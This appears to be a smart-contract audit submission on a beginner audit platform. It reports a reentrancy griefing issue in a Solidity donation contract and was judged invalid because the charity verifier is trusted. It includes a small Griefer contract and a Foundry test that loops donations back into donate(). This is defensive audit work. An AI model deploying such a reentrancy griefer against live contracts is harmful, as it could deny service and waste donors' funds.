GivingThanks
First Flight #28
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: low
Invalid

GivingThanks.donate(): Griefing attack

k3ysk1lls

Summary

A rogue verified charity may perform griefing attack after you make a donation

Vulnerability Details

Sending ETH to a charity causes an interaction with the charity contract, which may result in the donation being sent in an infinite loop.

Impact

This attack has a negative impact on the functioning of the GivingThanks contract, even though it does not provide a direct profit to the charity (attacker). Depending on the ETH balance of the participant donating to the charity, this could result in a block gas limit attack causing a denial of service.

Tools Used

Add the following contract to GivingThanks.t.sol file:

contract Griefer {
receive() external payable {
GivingThanks(msg.sender).donate{value: msg.value}(address(this));
}
}

And run the following test in the GivingThanksTest test contract:

function testGriefingAttack() public {
//setup attacker
Griefer griefer = new Griefer();
registryContract.registerCharity(address(griefer));
vm.prank(admin);
registryContract.verifyCharity(address(griefer));
//donate
uint256 donationAmount = 1 ether;
vm.deal(donor, 2 ether);
vm.prank(donor);
charityContract.donate{value: donationAmount}(address(griefer));
}

Recommendations

Modify access to GivingThanks.donate() with a reentry protection modifier. For example, you can use the nonReentrant OpenZeppelin modifier.

Updates

Lead Judging Commences

n0kto Lead Judge 12 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity
Assigned finding tags:

invalid-external-call-to-malicious-charity

Charity contracts are validated by the admin, it is safe at this step since admin is trusted.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.